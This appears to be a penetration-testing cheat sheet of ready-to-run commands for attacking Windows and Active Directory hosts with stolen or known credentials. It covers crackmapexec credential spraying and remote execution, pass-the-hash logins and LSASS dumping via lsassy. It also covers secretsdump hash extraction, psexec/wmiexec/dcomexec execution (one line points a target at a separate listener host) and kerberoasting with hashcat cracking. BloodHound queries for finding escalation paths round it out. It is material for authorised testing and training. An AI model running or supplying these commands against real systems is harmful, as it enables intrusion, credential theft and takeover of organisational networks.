w/ Creds


RHOSTS="192.168.1.0/24"
USER='user'
PASS='pass'
crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami
crackmapexec rdp $RHOSTS -u"$USER" -p"$PASS"
crackmapexec winrm $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec wmi $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec mssql $RHOSTS -u"$USER" -p"$PASS" -x whoami
crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS"
crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS" -M adcs

crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami --local-auth
crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares --put-file rustscan.exe /windows/temp/rustscan.exe
crackmapexec smb $RHOSTS -u"$USER" --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
crackmapexec smb $RHOSTS -u"Administrator" -p"$PASS" -M lsassy

enum4linux $RHOSTS -u "$USER" -p "$PASS"
mkdir /tmp/share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share

psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
psexec.py 'Administrator':'pass'@1.2.3.4
psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
smbexec.py 'Administrator':'pass'@1.2.3.4

secretsdump.py Administrator:'pass'@1.2.3.4 -history
secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history

wmiexec.py -k "user.ccache" 'powershell.exe "whoami /all"'
wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
atexec.py 'user':'pass'@1.2.3.4 whoami
dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first

Active Directory

LDAP enumeration
ldeep ldap -u user -p 'pass' -d do.main -s ldaps://1.2.3.4:636 all /tmp/ldeep
ldapdomaindump ldaps://1.2.3.4:3269 -u 'do.main\user' -p 'pass'

Kerberoasting
GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-path=/home/user/HASHCATPOT

Bloodhound

pip3 install --upgrade bloodhound
cd $(mktemp -d)
proxychains -q -f /tmp/PIVOT bloodhound-python --dns-tcp -u'user' -p'pass' -ns '1.2.3.10' -d 'do.main' -c All,LoggedOn

# https://github.com/BloodHoundAD/BloodHound/releases
./BloodHound --no-sandbox # Drag & drop files from last step
# Any unconstrained Delegation ? (BH query)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# Any constrained Delegation ? (BH query)
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) return p

# Find all the edges that any user has against all the nodes (BH query).
MATCH (n:User) MATCH p=allShortestPaths((n)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|AdminTo|CanRDP|ExecuteDCOM|ForceChangePassword*1..]->(m:Computer)) RETURN p

# kerberoast ? (BH query)
MATCH (n:User)WHERE n.hasspn=true RETURN n
# GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
# hashcat -m 13100 -a 0 /tmp/hashes.kerberoast rockyou.txt --potfile-path=HASHCATPOT

# preauth req ? (BH query)
MATCH (u:User {dontreqpreauth: true}) RETURN u
# GetNPUsers.py -debug 'do.main/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.10
# sudo hashcat -m 18200 /tmp/hashes.aspreroast rockyou.txt --potfile-path=HASHCATPOT

MATCH p=()-[r:HasSession]->() RETURN p
MATCH p=()-[r:CanRDP]->() RETURN p
Match (n:GPO) return n

MATCH p=(u:User)-[]->() RETURN p
MATCH p=(u:User)-[r:GenericAll]->() RETURN p
MATCH p=()-[r:GenericAll]->() RETURN p